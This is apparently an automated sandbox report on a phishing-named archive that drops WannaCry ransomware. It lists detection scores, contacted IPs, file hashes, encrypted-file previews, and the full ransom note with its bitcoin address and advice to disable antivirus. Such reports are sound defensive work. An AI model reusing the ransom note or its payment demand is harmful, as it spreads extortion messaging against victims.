            C:\Users\user\Desktop\TaskData\Tor\tor.exe | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\TaskData\Tor\zlib1.dll | 0% | ReversingLabs | |
            C:\Users\user\Desktop\TaskData\Tor\zlib1.dll | 0% | Virustotal | | Browse
            C:\Users\user\Desktop\taskdl.exe | 89% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Desktop\taskdl.exe | 88% | Virustotal | | Browse
            C:\Users\user\Desktop\taskse.exe | 87% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Desktop\taskse.exe | 88% | Virustotal | | Browse
            C:\Users\user\Desktop\u.wnry | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Desktop\u.wnry | 90% | Virustotal | | Browse
            C:\Users\user\Documents\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Documents\@WanaDecryptor@.exe | 90% | Virustotal | | Browse
            C:\Users\user\Downloads\@WanaDecryptor@.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry |
            C:\Users\user\Downloads\@WanaDecryptor@.exe | 90% | Virustotal | | Browse
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe |
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smail | 0% | Avira URL Cloud | safe |
            http://freehaven.net/anonbib/#hs-attack06 | 0% | Avira URL Cloud | safe |
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Avira URL Cloud | safe |
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw | 0% | Avira URL Cloud | safe |
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Avira URL Cloud | safe |
            http://freehaven.net/anonbib/#hs-attack06 | 0% | Virustotal | | Browse
            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta | 0% | Avira URL Cloud | safe |
            https://sabotage.net | 0% | Avira URL Cloud | safe |
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw | 0% | Virustotal | | Browse
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how | 0% | Virustotal | | Browse
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s | 0% | Virustotal | | Browse
            https://sabotage.net | 0% | Virustotal | | Browse
            No contacted domains info
                                                           IP | Domain | Country | ASN | ASN Name | Malicious
                                                           171.25.193.9 | unknown | Sweden | 198093 | DFRI-ASForeningenfordigitalafri-ochrattigheterSE | false
                                                           78.142.142.246 | unknown | Austria | 8437 | UTA-ASAT | false
                                                           167.114.66.61 | unknown | Canada | 16276 | OVHFR | false
                                                           77.73.69.128 | unknown | Russian Federation | 43317 | FISHNET-ASRU | false
                                                           80.127.137.19 | unknown | Netherlands | 3265 | XS4ALL-NLAmsterdamNL | false
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:38.0.0 Ammolite
                                                          Analysis ID:1375296
                                                          Start date and time:2024-01-16 11:58:01 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 15m 18s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:211
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Request for Quotation (RFQ_196).zip.zip
                                                          Detection:MAL
                                                          Classification:mal100.rans.spyw.evad.winZIP@985/1012@0/6
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 69
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .zip
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadFile calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                          TimeTypeDescription
                                                          11:59:27API Interceptor358228x Sleep call for process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe modified
                                                          11:59:39API Interceptor2x Sleep call for process: @WanaDecryptor@.exe modified
                                                          11:59:41API Interceptor1x Sleep call for process: WMIC.exe modified
                                                          11:59:53API Interceptor1x Sleep call for process: dllhost.exe modified
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.99982687688155
                                                          Encrypted:true
                                                          SSDEEP:24576:KBgjcAcw1KVmp5wViqcMocuc1sp7mVCDobtOwhkb0HT1W9mtq:4gj0mKVkMiqP8c6pehkb0Wmtq
                                                          MD5:8D7493BEB6503C2D0ECF14991C18D5E3
                                                          SHA1:95EEC156A4F2115FD702D7F335ADBA729A8457D1
                                                          SHA-256:B2BE7E5FF084D767AC716FB81998C51BC970A6A7016A450E3EB149302C6D6C7D
                                                          SHA-512:67AA8834DC3531906A5EA472736DD82C9BBBBB8E6F2266250D664E15DDBDA1C352471E7752E4C9300B1F8ADB11B34C0DD6EAF2608308ACAA22500273C7A06A44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):544936
                                                          Entropy (8bit):7.99963243634618
                                                          Encrypted:true
                                                          SSDEEP:12288:qws05J6xPHFIDU/1tOJ/iSwL0umfUJQaZgcEp2WI:u076ZFM/ivLr6Uma2bp2WI
                                                          MD5:F204E1FEC63618656EAACD52FD302AC4
                                                          SHA1:BAB16916E3DEBC769C822A7BB58D2C8AF13D3705
                                                          SHA-256:A582FDC049E2D29F1DFCC3ADBBA755FE03F8F514A01400DF82D6C3D2185C51E2
                                                          SHA-512:C77E2245BB4A0FD2D4A185A0662D26D653CABB407745EF13DA7FB17FA0DDF2D7B4F2AE3F02742D3E5F5EC3C17E613D54AE97A1BF41AE5B529DF3F071C69109FE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):261608
                                                          Entropy (8bit):7.999403800781675
                                                          Encrypted:true
                                                          SSDEEP:6144:HVpJcd4NOeZV6CMTC04TTSS510+p53WTqxiLuaR6sY+g+zlT91:HVpmdEsCrPp1bpRcqkR6slzhj
                                                          MD5:754EABE869C1F1B193F81B1ADA2B65F6
                                                          SHA1:AA1ADC136B26092F2D13EA365ED24205F9E1E868
                                                          SHA-256:F934097042514DB515E61C93E69AEBDB1AC397DA27B36E671CAFD43358BBD2D3
                                                          SHA-512:DE4F61CA5A851274D241BDAB9F228FFD856B80EF4C0B2B2BCE0C76EEAD979866D08AEA5DEA883D45C6BB786E78D0927B6ADCD669212F4A62CEB982E422417BDE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70648
                                                          Entropy (8bit):7.997319898348123
                                                          Encrypted:true
                                                          SSDEEP:1536:dHYRCZmYM2DmIxQ54I8BS+hChgchOozvRth8wUrz9XH7Wa4x8m:Co3jxGFhxXJD8wG9XbQOm
                                                          MD5:0410CB353EADCF134CF37A5EB3567F38
                                                          SHA1:5E84AA33D4E501A666EB73CFE245C91F85EE4127
                                                          SHA-256:2BCB5BBFA8AFF96AD0932B4F7FB8879D4CDEDC82BCB2594645B4A51262DE4B22
                                                          SHA-512:76F0A1460E1106513F5B90BF8271A566A716471896CCF2015E11E0D4AE98B2AAC52782A48E88D71AFE43F85D82AAE9A828D4CE59C4CDD49CE880CDF15CD226EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......c......QwnK.<L.U.>...1..?K.../...C:.N..l..f.8L0...M..Z....a.....T...g...=.7..7.J.....2.;...H<T..vT.Kd."._;f.lo.....%.......<^o(.~..;.flT...7..m..o]..f....jZ0"k..d'..B.Z..6.m.....3Y..?ul......J.(E.S.hP.;......].z.y.Z..L...pw........................0N9._....cu..t.:.....0.Jv.8w..X..Oi..h...[.i7.7..*(.e..j..J...Tt....E|.@......2.0r.5..:x:....._....7^.P..v.<.6.A.......e..x..z..."..m3O9.;y....d........L..0.8.R.2I... nwHB..6.3oz..1.g._.$..P.g...!...G..k.X.............."y..-.'b.../.dU.....,.e3k......0.Q..b."{......j .z.r.L......k.!x.}.k......C...l....G.9y.@k....3..x.,..;.6...U.... L2.+.-.V..."../=.I...0/....X...d$..|^u.*.=....Y...y|jKm.J.....!B.....C.....%../...zCf..ix.........p.y^..Z$-..0k..`..e.Pd..g$........z.7..V(/.N#....<.......Z...{t){.Mq..Q.....Vj.?...r>v.T.=..~{kW.ZKg.]..r.m..!...c.j7..............%..l/A....W.f.......b7^.SJ.@iF.......f.Yd...5i...Y.>....y[..T9....XI...r...{<Bj..|.A`.!...m...F.N4...7<.^/6wr3%.mf.vI.;
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4648
                                                          Entropy (8bit):7.9595688349112725
                                                          Encrypted:false
                                                          SSDEEP:96:o+7gQLou/yKcReOherqTjVvSRvwx52FcU/c/xkldpddE2aj1Q/b1HbuR0z:gQLB/yL6qTxe8r+uxkldy2aj1QD178K
                                                          MD5:47A1E44885626CBCF23B17288EF41F88
                                                          SHA1:5C07E0721646335C6B99EA1F71E2C0472EDFF926
                                                          SHA-256:DE8882DA1FB1D22F7F41125A70E0E32A7D4702C049785A6C18E265DBEE89FDB3
                                                          SHA-512:AEC172C27C3DED595ED30538C2A785E89F5787EEF1B3DD129257EF237D0FC806EEDBB7D0187B14646FE82BE95F07F5A5B197230BF32FD830048A774F0C214876
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9....~.CypSj..Eq.U{..a.!.</O.Df.Tp%p'.J..^.U'.).r.t...5._..i4.D...V9.....y... ..;fY.5Q.[......R....!G..5`.h.i.............wV*...g.f.....B. C'.."..?H0....Y..}......Uxb.6}.h..C..b.(.(f#.}.. i..p.-..4........Z..0...k.)&n".q..<..&4..yW..+.Z..c.1.{............r...Ly.....fT"O....$`....b"f.G...&.-A.r65.ZZ...9Q......$j..............k..Y.......CR-(.....e...T..9.k..Ij\...Y..(A.w...;..rN......i.)..C..g.ox.....A..x.......F...D....)..z3.uk...d.OV...(\H.tI..b......2]..O.....+!?.........E.GRt1\...V.7.2...V...k..^3.. .C.t....!fi~...cEt........'(....:..g.......'.d.?xl.lB...Q...A.[y......8.K.c....o..j.w.BGP..C....t....TA.rxnGG...N/2......v../..._T1....x..&.....J.m..3.(.H. &v..q....+t..c_[.@....l....o..j...p...b..[[cF...TL>..1.Iaz.)3aQ.z..-,*....2<.r...s<.....7....4.H.%.."a..@..29....w..D.....)]To.\R.U...A..c................:F.7..p]R..p..J.#.X.-.|@.v.B.w.6.c..v.A4.1...]..`d5>.a.O.u.D..N&.G..p}....H.d.E.(.Nd...w.~.&.9K....on..\..E.....R
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):840
                                                          Entropy (8bit):7.765115016605481
                                                          Encrypted:false
                                                          SSDEEP:24:bkp8zynzaNfTEQm+RcXP++lLEJtaggXb9XsZ:bkpfpXHXm+lWwd9i
                                                          MD5:4617B6CFE3DF022A3383A6BA1C169BD7
                                                          SHA1:09BEB56005B9B4AE3CB4C4B729E8F96D19C9B962
                                                          SHA-256:C70CD6F6210D6F7F8574C2A1347D01A6577334B41ECF8167AF433393F70B0CE9
                                                          SHA-512:8F4D1357CB25EAA4F6D6CA5B3DBBE2E67C1A8541CD1807AE00F76A5A379726547026062A0D8672E76B2113E7330A213C8745B1D7223539FEF39EC7B30A34CF55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...../.I.d..G.^..Q......:H...x.1....m.s..D...)?...)...c.E.v.......H.w...?s+3l..i.y...%x.....K.Og...e~k...(...0HRlf...I.T.6....v.K.(..m...v)......@.E3.S4V.<h -.}.S7.(.....k....s.I.Z.......s...M}.H...Ki().Rm..4IY,...-e....zOv}..>.......X..*.[.(..iK.............+....YxVo.F8.s..`.=..VC...&.{Oj..H.Z...|...e.>....A.P.^..Ee..M....B..l.......MN.l....pjT.l.4.nJ...yT.{....G..MI..NS........Vr.j%.m..K.7m..N_..p...%..O7...M9..G\..f.1.m.;)':..*.q.1.07..'.3...[...*...&..K.o/.<].:.qG.O...........w.27.qE"R...=!..}...=x.....u'..Qu.(k.....D..ePazH....R...9`.@.a..9.....6...\....1Hb ...S......d..y..4..1.....$....k.+.3...N....ZJi.K.;.......,...x.?a........al.]..qr..w.E....1=.s.8..}..H.}c..4..m.....i.....K[`1.@.w............J..EU}..z3w...p.....2....3.Jb..4]jf.Jo.........Go)....f~........B..`.a2.F..9.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.430548721712902
                                                          Encrypted:false
                                                          SSDEEP:12:bkE9MvrrcshuIHX33MqlgyS1Tt7T9o73xjXZ:bkGMbhuIH3NgyC7S3JJ
                                                          MD5:172E70949E08D44A6AB9CDCD9D662E7B
                                                          SHA1:199A2D333C267F7EF5D434E91521684929EE54AB
                                                          SHA-256:09253AD4B467E7D2B8199733EBBF89ADD839E91C0C84866E159D9C21ACBBE095
                                                          SHA-512:AD0F429E44BBBF0760DD7D3011541CA0EF0E6A153C921D50B827AB23F5A7A653A8A0822AD5F2F49F3F131CB221151B7298FB0ACC4B5EE0A5CB726AA7CEBD7247
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......ka..3..3w.4.:..h,we".,lf....n3}~&.O.i..~.v..)4S(....I R.4Z..4.6K.;...,...p..V......yI..9.....8=..k.b.P.p.h..3vi.....c....l/.!p.b....~*......G.D.4..B...5....9O..B.\.mI.[.7..E....Z."...ug..)@|Q%.?......R.......uU.T!.e.Ot.+.6S|}..b..<.c....E.............n.n..yB.........88P.7.{..k...B..B.p...N...c.P{.s.|(..s..V....qf.. 2........t?....M.@2.........Q...T.e{.O+c..<E....>Rb.7.O.E..GA....F...[...........\...e4.+
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):536
                                                          Entropy (8bit):7.530288430810619
                                                          Encrypted:false
                                                          SSDEEP:12:bkEQZeEdZvo0JrPO52JSyps+LMrZjizOQ/pVnERDI0nogdID:bk5dZvo0dOUnoZFQ/rKIqoRD
                                                          MD5:BCC771E9CFBE349D357208AE163D02A0
                                                          SHA1:F2E590A420AD008C414E8A17C42E326A46AA2E19
                                                          SHA-256:7FF087189A67196C8E46FAB55EAC689A4C7CFEE566B252DC65CDD74356F7A4D7
                                                          SHA-512:5A0990AD885B630EE7A3C33462C29615BF08432B07E5328739DF5AE92977A8EC0BD40920E7434FB8C75220AD69E9A72701694B41DF74A1769F59C5E5C4AF3845
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."...".....:z.Y.).. .+.W.D.;vv....X.{,>........Z.X.h.......P.v; .....Ro`..l.(. &..l{..d._..#..z}....Z(.g...2....K..l.<.K.21.GUbd.+!.F0.......Y....3...$g..(......M$..R..2...).Y. .....tm.3.....Y..9........*0&C27U...k=C....^.~M..E...C....(.....M.................b...x.A....h..(.HcG. +p..*U.....V}h"......X.xf[..$..-&..{..M..|...h...\.....sC.(.}).c..1....Q..N.9.&..aS.K..n.../...F..B..xE.G....n.Qw...3&9<... ...|..F}.u0[...k.e.6...*.rV....t.+.D..y9e.{...7......&.-.l...b.2.|.H..9......:....5..9R.O...$J
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.502060510489496
                                                          Encrypted:false
                                                          SSDEEP:12:bkEHhkVwgbQ1K0jMEgwGCIt1p8aAwssQKs39:bko2Dx0gLwnItr/1ssQKst
                                                          MD5:8DB6DC070D22AFF9900EA427D0F6367C
                                                          SHA1:FCCF241A8B8B35102C762B42AAFB580820971243
                                                          SHA-256:D905DB65383DEAE3052AD44BED87B71CD047B1862B86CE4D40036D62CD5FC21C
                                                          SHA-512:B09C25903684AD9241656BF6B866A45663AE312FFF4E5B778C02F3D141F5AE4C307EA8CD361B330A09D066DA18956B7ECE555E92B367F4A5DDDE39DA15B5F8AC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@..F.G..A]..C......./.*.{.o....;..........p.]....,5.6E..j...Yc?..g...~@.... ...v.....g"......}Je.b.d<T...!..#>...$..R.f7l.....S.RO.L....0.=.L..*.c...:2vCPi.&..3...|.xu.*.l\]...}'.>.._@..4../8.9<.o k}.6..l.....S.-+.R..X.r..2.XQzi..5..q<.c.m.w0..1....................K.h9m..8.}...#r..T{..V......O.'>.s.gy.+.D..5h....db.d.S.7.R{VM.......).E....{D.vT...Z<.?1...]...Z'.z..:V...9...\. .w;FM5...2B..CF%....F%....T...&.%N~;>
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):456
                                                          Entropy (8bit):7.545754798387096
                                                          Encrypted:false
                                                          SSDEEP:6:bkEYkl2qCdE7AU/p1qfIIOwRxEdl1yc/VkbeiqX7liMwk1elDi3NZLbnMjpmlyOJ:bkEYv6D/RvtgWn42NtnldSKpkR/pOxp
                                                          MD5:90F4268D15BC580AABB3649A2099477E
                                                          SHA1:01775E51F730F5171814B684BE508E6F0F11C3A9
                                                          SHA-256:5151223DD4A267F42FE63FA68814AA94E9B6287DA9AB08F291D56000CA0F0B60
                                                          SHA-512:93141881C2F86DB587130C39C12298B29DB5B3ABEE0E8A7E84855A6B39B2491FCA82979E12A11F87181E7436148422C1EE43FA92FC6DF5E5B39BF45F34743D0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....JRS'>....G>.F.9UQ.i....`.P.R(..c...a.r@5....`.)M....wVhF........b!mm.A....xn%nd.h.N[.g...<.Z..z..&...-..k..>f<7.`=^X..1|..|...v...D....au....o.T_.!"O...H.[...c.....}... ....E=...QZ...^...^T..d.2..;....T.{...JK...o$............x.{.Qp,7.#.<.S....K..............9..p...-...&..F..zC._P../R=.....V.....>...B........R....2y.T.S..ej.K.M.....y...F..'...l.........tap..A...3.5.>.....4.@..;.Ay`..f.m..~.C.r...z_VV.Z......`.....<WS..k.'y
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.503145280886426
                                                          Encrypted:false
                                                          SSDEEP:12:bkEZIV77l0nxipaZR085WW4TwF3cJVo9znJDYwTaTO:bkx77l0n4qx4WOW3cJVI9YyEO
                                                          MD5:99C28323C4BA450CE7C3847DB9A45AED
                                                          SHA1:6F3625B3B1E2FD6A4FBE3FF442F952687CDA6EC9
                                                          SHA-256:24225ABB88787095E4841D0836D6D8681FF5DB47E36446454A6F4A279A62639C
                                                          SHA-512:0F32193227A62931107CBFAF4CB574AC0A2F65E2502E50EEA1CFADC7DDC0B0ED2932E4D23A303832154EA60B42C26646240B03999EF2B15D2362F38584D74D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......r.Z..].L...$oz\"{.c..Yc....zS.J.G...............]...a.j^n.....N.....*.......f$...$../....Q7.!.1..TqD..GBq.....#...,.~Qu`q4E)G$.9.R..Ej...<....Mr_}G..r.y..H......r...$.z..:.c'.7..Z^r...1.'......5..%.w.....=..F.D>.m4v....(..Z6...F..j%.}.............{.[.....9cXP.EB.ri.e..^.....&.."RU....w/F>iM..."...-..........<(254........d3....%.....#.......U,.]..(.i.. )i..O.8.f.A99...V`7..t.a../<B..Mse..4q..F'I..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8248
                                                          Entropy (8bit):7.97803983600239
                                                          Encrypted:false
                                                          SSDEEP:192:gWHkX3+Yc0/W0Y2ib/48WLXWojrkNxjqBH2XKMt6FdB:gWHkH+Yc0/W0Y2sv0WWKjqcXKuKB
                                                          MD5:4D7A06B8D9B31FF8A3540DBE612465AD
                                                          SHA1:9F64A39E59D43913E5ABDB5F53097BA7A3106372
                                                          SHA-256:E9507471EB677EC2CFC1D509EAD85B4282A5C55C067B4E2CD3D94CBAE6124E68
                                                          SHA-512:45970EDFD007321B34F770F687896603DA81A5825D1FB78CB5EF4E12F2150840AC6CF797437AD26757334901BAFC02F5B9B5CC035F3E3C3951D571623EC571F9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5976
                                                          Entropy (8bit):7.97019057849541
                                                          Encrypted:false
                                                          SSDEEP:96:oOrysT/Q6WAv8Ze79ROKvup5b2eAO5Jbt6BHL5GgRvOZa4OVRdWoTzodWqLmLScL:nT/FWSR2p0vOrY422ZVOVRdWFWimLSrC
                                                          MD5:A70B94B87D99389078C40B1CB83C6608
                                                          SHA1:95F1363262B6CCD715DC8FE563CDB2216FF9F7AF
                                                          SHA-256:6BA085B42818B076C913B9AFA71DB28BF265F9C3A598F50625EBBB81A0F75313
                                                          SHA-512:027EA99A6042FB2C1EE230649437D0F95300B7E26FFD92FD3864BE4166ADEB1C2BC86582FEB324A71CAF5AE5959EC2C38B6F838E50E9F32E73D0001C91776EC2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19880
                                                          Entropy (8bit):7.989871390341088
                                                          Encrypted:false
                                                          SSDEEP:384:7IQm0pJN2ulQEq8nA6uLxTzWf0DCqiuYpXI5tvBg7UmHpEJ3jfF0akcbj8OH4:7Dm0HlQp8A6CTzWfO7qXI5oJG3TtsOY
                                                          MD5:42AB4AEAA9D5DF71C4CA7926B11C4D5A
                                                          SHA1:BEFD3DF2DE76C6F7B42DE8C255A3D9E3AA983051
                                                          SHA-256:DEA704534E634E576718B724AA62D9284025D9B2B6E848935132F384CF706A08
                                                          SHA-512:E776EC938E592F6ECA99037BB74518013276C35FD925674887F2A093A5DD47FA0CC927F991FA8BA8F064562604CA17ACC87726F4F4975E7617D3B6E868B5B008
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2104
                                                          Entropy (8bit):7.9182551444366
                                                          Encrypted:false
                                                          SSDEEP:48:bkPyc2sVYO92zJhZZTR4g3/6iWA7qiXYBoU0fJ5KZiIG08UrU:oP/XYO92lz9v5XEi5081
                                                          MD5:32B6E813CA9DBFE7BD67AEBA04C70018
                                                          SHA1:E36310CE1D8E8D0E615C49DD16BF9707EE2937B8
                                                          SHA-256:1BD43DD89C9493098AE048265E3E5614EA8AF3B91BEC4FFDE10A3AA625FAA556
                                                          SHA-512:39D8AC1D41FA3434227BEDA123B817ADEC51DEB047A6135D2A4A1BE097690338E69284C0E8B3244454BA8EB28EE0D3B9BA00B7EDF4E67E953C3CC5C56D1BC020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9455628451804765
                                                          Encrypted:false
                                                          SSDEEP:48:bkWgUKBp4zJbsnFpcrM/SdtihgPvtEYCNmyOttDfpEa+jCjI1XJbWZcacBBS3EXv:oWUCzJbxfOgH2NmvXfMjCU1ZbWZcVEO
                                                          MD5:0A8B78AAB381C21AD2E8A49B1E1B4508
                                                          SHA1:C32D6E83C015C2EE35B86E65E93054EDE1F0EEF2
                                                          SHA-256:39BAD2E46D2B0BBF3BB8394C6957855C741C560EF1CE5E17FCB0A68C625664D9
                                                          SHA-512:AE35E936F81331222A11516AA580A1BC1233D75DD87E990A25BBFB74AFCD85D784461195006FC58B9CB44668FF5FBBE9E18DB259A46FF6BF21DBC57F4C3A148F
                                                          Malicious:false
